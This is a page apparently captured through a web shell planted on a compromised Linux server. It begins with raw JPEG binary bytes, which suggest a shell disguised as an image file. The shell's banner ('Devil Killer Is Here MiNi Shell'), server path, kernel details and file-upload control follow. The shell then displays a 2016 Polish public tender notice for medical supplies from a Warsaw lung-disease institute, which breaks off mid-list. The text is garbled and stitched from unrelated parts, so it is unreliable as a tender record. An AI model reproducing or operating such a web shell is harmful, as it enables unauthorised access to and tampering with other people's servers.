JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160704/117423-N-2016.html

<p class="kh_header"><b>Warszawa: Na dostawę materiałów medycznych określonych w 18 pakietach.</b><br>
<b>Numer ogłoszenia: 117423 - 2016; data zamieszczenia: 04.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Instytut Gruźlicy i Chorób Płuc , ul. Płocka 26, 01-138 Warszawa, woj. mazowieckie, tel. 43 12 312.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.igichp.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Instytut badawczy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Na dostawę materiałów medycznych określonych w 18 pakietach..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa materiałów medycznych określonych w 18 pakietach:
- Pakiet nr 1: Klipsy naczyniowe;
- Pakiet nr 2: Klipsy tytanowe;
- Pakiet nr 3: Elektrody, kaniule do stymulacji serca;
- Pakiet nr 4: Maski, łączniki, układy oddechowe, rury;
- Pakiet nr 5: Kraniki, kaniule, igły medyczne, strzykawki;
- Pakiet nr 6: Akcesoria do drenażu klatki piersiowej.;
- Pakiet nr 7: Termometry;
- Pakiet nr 8: Filtry do respiratora Nellcor Puritan Bennet 840;
- Pakiet nr 9: Materiały zużywalne do pomp Medima;
- Pakiet nr 10: Przyrząd do pobierania lub wstrzykiwania płynów do/z fiolek i butelek, zgłębniki i zestawy do żywienia;
- Pakiet nr 11: Rękawice diagnostyczno - zabiegowe medyczne, lateksowe;
- Pakiet nr 12: Rękawice diganostyczno-zabiegowe medyczne, nitrylowe;
- Pakiet nr 13: Miski z pulpy do mycia pacjentów;
- Pakiet nr 14: Cewniki, dreny;
- Pakiet nr 15: Dreny, łączniki, zestawy medyczne, rurki tracheostomijne;
- Pakiet nr 16: Podkłady chłonne z włókniny;
- Pakiet nr 17: Maski i helm do CPAP, BIPAP,VISION;
- Pakiet nr 18: Maski do aparatów Res-Med i Bennett..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7, 33.14.12.20-8, 33.15.71.10-9, 33.15.72.00-7, 33.14.00.00-3, 33.14.13.20-9, 33.14.13.10-6, 33.19.00.00-8, 33.15.85.00-7, 33.17.11.00-0, 33.14.16.20-2, 33.19.80.00-4, 33.14.12.00-2, 33.14.16.40-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunku zostanie dokonana na podstawie oświadczenia o spełnieniu warunków udziału w postępowaniu. Zamawiający dokona oceny spełnienia wymaganych warunków na podstawie załączonego do oferty oświadczenia wg kryteriów spełnia lub nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W celu potwierdzenia, że oferowane dostawy odpowiadają wymaganiom określonym przez zamawiającego, wykonawca powinien dołączyć do oferty:
1.dokumenty potwierdzające, że przedmiot zamówienia został wprowadzony do obrotu zgodnie z wymogami ustawy o wyrobach medycznych z dnia 20 maja 2010 r. (Dz. U. z 2015 r. poz. 876 z późn. zm..). W przypadku, gdy opisany w SIWZ przedmiot zamówienia nie został sklasyfikowany jako wyrób medyczny zamawiający wymaga złożenia stosownego oświadczenia, że przedmiot zamówienia nie podlega ustawie o wyrobach medycznych;
2.dokument producenta potwierdzający, że klipsy wykonane są z tytanu lub stopu tytanu
i umożliwiają wykonywanie badań MRI u pacjenta; (Pakiet 2)
3.karty techniczne zawierające parametry filtra opisane w Pakiecie nr 8, poz. 2;
4.próbki oferowanego przedmiotu zamówienia:
        - Pakiet nr 1, poz. 1,2 - po 1 magazynku (6szt.);
        - Pakiet nr 2 poz. 1,2,3- po 1 magazynku (6szt.);
        - Pakiet nr 3, poz.3- 1 szt.;
        - Pakiet nr 4, poz.4 - 1 szt.;
        - Pakiet nr 5, poz. 10,11,12 - po 3 szt.;
        - Pakiet nr 6, poz.1 -  1 szt.;
        - Pakiet nr 7, 1 szt.;
        - Pakiet nr 8, poz. 1,2 - po 1 szt.;
        - Pakiet nr 9, poz. 1,2 - po 1 szt.;
        - Pakiet nr 10, 3 szt.;
        - Pakiet nr 11, 1 op., rozm M;
        - Pakiet nr 12, 1 op.. rozm.M;
        - Pakiet nr 13, 3 szt.;
        - Pakiet nr 14, poz. 1,2 - po 2 szt.;
        - Pakiet nr 15, poz. 1c i 2a  - po 2 szt.;
        - Pakiet nr 16, 2 szt.;
        - Pakiet nr 17, poz. 2 -  1 szt.;
        - Pakiet nr 18, poz. 1b -  1 szt.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokumenty, w formie oryginału lub notarialnie poświadczonej kopii, potwierdzające uprawnienie osób do podpisania oferty i innych dokumentów, o ile nie wynikają z przepisów prawa lub innych dołączonych do oferty dokumentów rejestrowych. Jeżeli w kraju miejsca zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1), zastępuje się je dokumentem zawierającym oświadczenie - złożone nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin dostawy - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§1ust.2.Zamawiający zastrzega sobie prawo do nie złożenia zamówienia na towar o wartości nie wyższej niż 20% łącznej wartości towaru objętego niniejszą umową z powodu nie możliwej do przewidzenia liczby pacjentów i procedur medycznych, na co Wykonawca Wyraża zgodę.
§2ust.3.Zamawiający przewiduje możliwość zmiany zawartej umowy sporządzając aneks terminowy z uwagi na brak możliwości precyzyjnego określenia jednostek chorobowych występujących w trakcie trwania umowy.
§2ust.4.Ceny netto są stałe i niezmienne przez cały okres obowiązywania umowy. Cena brutto może ulec zmianie podczas obowiązywania niniejszej umowy jedynie w przypadku zmiany stawki podatku VAT.
§2ust.5.Zmiana ceny w przypadku określonym w ust. 4 wiąże Strony umowy z mocy prawa i nie wymaga dokonywania zmiany niniejszej umowy w formie aneksu.
§2ust.6.Wykonawca oświadcza, że zmiany o których mowa w art. 142 ust. 5 pkt. 2 i 3 ustawy Prawo zamówień publicznych nie będą miały wpływ na cenę towaru, a tym samym skutki wynikające z takich zmian Wykonawca poniesie we własnym zakresie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.igichp.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Instytut Gruźlicy i Chorób Płuc, ul. Płocka 26, 01-138 Warszawa, budynek E, lok. 24..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.07.2016 godzina 09:00, miejsce: Instytut Gruźlicy i Chorób Płuc, ul. Płocka 26, 01-138 Warszawa, budynek E, lok. 24..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> - Pakiet nr 1: Klipsy naczyniowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Klipsy naczyniowe do zamykania naczyń. 	szt	1 560
-2.	Klipsy naczyniowe do zamykania naczyń. 	szt	1 560.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> - Pakiet nr 2: Klipsy tytanowe..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Klipsy tytanowe	szt	21 000
-2.	Klipsy tytanowe 	szt	30 000
-3.	Klipsy tytanowe 	szt	1 800.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.11.20-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> - Pakiet nr 3: Elektrody, kaniule do stymulacji serca..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Elektroda do czasowej stymulacji serca.	szt	6
-2.	Kaniula do wprowadzania elektrod endokawitarnych.	kpl.	6
-3.	Koszulka ( introduktor ) z zastawką, igła angiograficzna, prowadnik.	kpl.	6.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> -Pakiet nr 4: Maski, łączniki, układy oddechowe, rury..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Maska resuscytacyjna dla dorosłych, umożliwiająca sterylizację,  w wersji mikrobiologicznie czystej :	 	 
	                                          -  rozmiar  3	szt.	20
	                                          -  rozmiar  4	szt.	20
	                                          -  rozmiar  5	szt	20
-2.	Maski anestetyczne - jednorazowe bez zwartości PCV i latexu. 	 	 
	                               roz. 3	szt	150
	                               roz. 4	szt	170
-3.	Maski do tlenoterapii dla dorosłych.	szt	600
-4.	Łącznik karbowany tzw. martwa przestrzeń	szt	4 000
-5.	Łącznik podwójnie obrotowy kątowy.	szt	50
-6.	Kapturek zabezpieczający.	szt	2 000
-7.	Złączka równoległa.	szt	800
-8.	Łącznik prosty.	szt	50
-9.	Łącznik  prosty.	szt	100
-10.	Układ oddechowy do aparatu do zanieczuleń dla dorosłych.	kpl.	300
-11.	Uchwyt mocujacy rury	szt	1
-12.	System klipsowania rur 	szt	20
-13.	Rura karbowana.	mb 	4 000
-14.	Rura karbowana.	mb 	100
-15.	Plastikowe łyżki jednorazowego użytku, do laryngoskopu Macintosh będącego na wyposażeniu IGiChP. 	szt	400.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.72.00-7, 33.14.00.00-3, 33.15.71.10-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> -Pakiet nr 5: Kraniki, kaniule, igły medyczne, strzykawki..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Kranik trójdrożny.	szt	6 000
-2.	Kranik trójdrożny.	szt	50
-3.	Kranik trójdrożny.	szt	7 000
-4.	Igła do nakłuwania membran silikonowych portów.	szt	50
-5.	Igła do nakłuwania membran silikonowych portów.		
	_ rozm.  22 G 	szt.	100
	_ rozm.  20 G 	szt	100
-6.	Strzykawki jednorazowe, kompatybilne z parametrami kalibracji dla pomp infuzyjnych będących na wyposażeniu IGiChP : MEDIMA S2, ASCOR AP 14 i AP 12, IVAC serii : P1000, P2000, P3000, P4000, P5000 .	szt.	22 000
-7.	Igły do nakłuć lędźwiowych o rozmiarach :	 	 
	                   _   1,1   x   90	szt	200
	                   _   1,2   x   90	szt	200
-8.	Igły do podawania insuliny z wstrzykiwaczem.	op.	180
-9.	Kaniula do żył obwodowych 24G	szt	100
-10.	Kaniula dożylna, roz. 22G 	szt	8 000
-11.	Kaniula dożylna, roz. 20G 	szt	17 000
-12.	Kaniula dożylna, roz. 18G. 	szt	3 000
-13.	Kaniula dożylna , roz. 17G 	szt	3 000
-14.	Kaniula dożylna, roz. 16G  	szt	100
-15.	Kaniula dożylna bezpieczna Rozmiary:	 	 
	      -   0,9 mm	szt.	100
	      -   1,1 mm	szt.	200
	      -   1,3 mm	szt.	200
	      -   1,5 mm	szt.	100
	      -   1,8 mm	szt.	50
	      -   2,0 mm	szt.	50
-16.	Kaniula bezpieczna w systemie zamkniętym. 	sz	100
-17.	Kaniula dotętnicza.	szt	1 100.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.12.20-8, 33.14.13.20-9, 33.14.13.10-6, 33.14.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 18.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin dostawy - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> -Pakiet nr 6: Akcesoria do drenażu klatki piersiowej..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> -1.	Jednorazowy sterylny dren dwukanałowy z końcówką pojedyńczą do ssaka Thopaz firmy Medela będącego na wyposażeniu IGiChP.	szt	700
-2.	Jednorazowy sterylny dren dwukanałowy z trójnikiem do ssaka	szt	400
-3.	Jednorazowy sterylny zbiornik do ssaka Thopaz firmy Medela  będącego na wyposażeniu IGiChP.	szt	100
-4.	Jednorazowy sterylny zbiornik do ssaka Thopaz firmy Medela będącego na wyposażeniu IGiChP.	szt	900
-5.	Jednorazowy sterylny zbiornik do ssaka Thopaz firmy Medela będącego na wyposażeniu IGiChP.	szt	10
-6.	Jednorazowa sterylna zatyczka do drenów jednorazowych	szt	300
-7.	Jednorazowy filtr antybakteryjny do ssaków elektrycznych i próżniowych Medela będących na wyposażeniu IGiChP.	szt	500
-8.	Jednorazowy filtr antybakteryjny do ssaków elektrycznych Vario Medela będącego na wyposażeniu IGiChP.	szt	10
-9.	Zbiornik do wkładów jednorazowych	szt	2
-10.	Adapter do ssak Vario będącego na wyposażeniu IGiChP.	szt	2
-11.	Wkłady jednorazowe z żelem	szt	60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
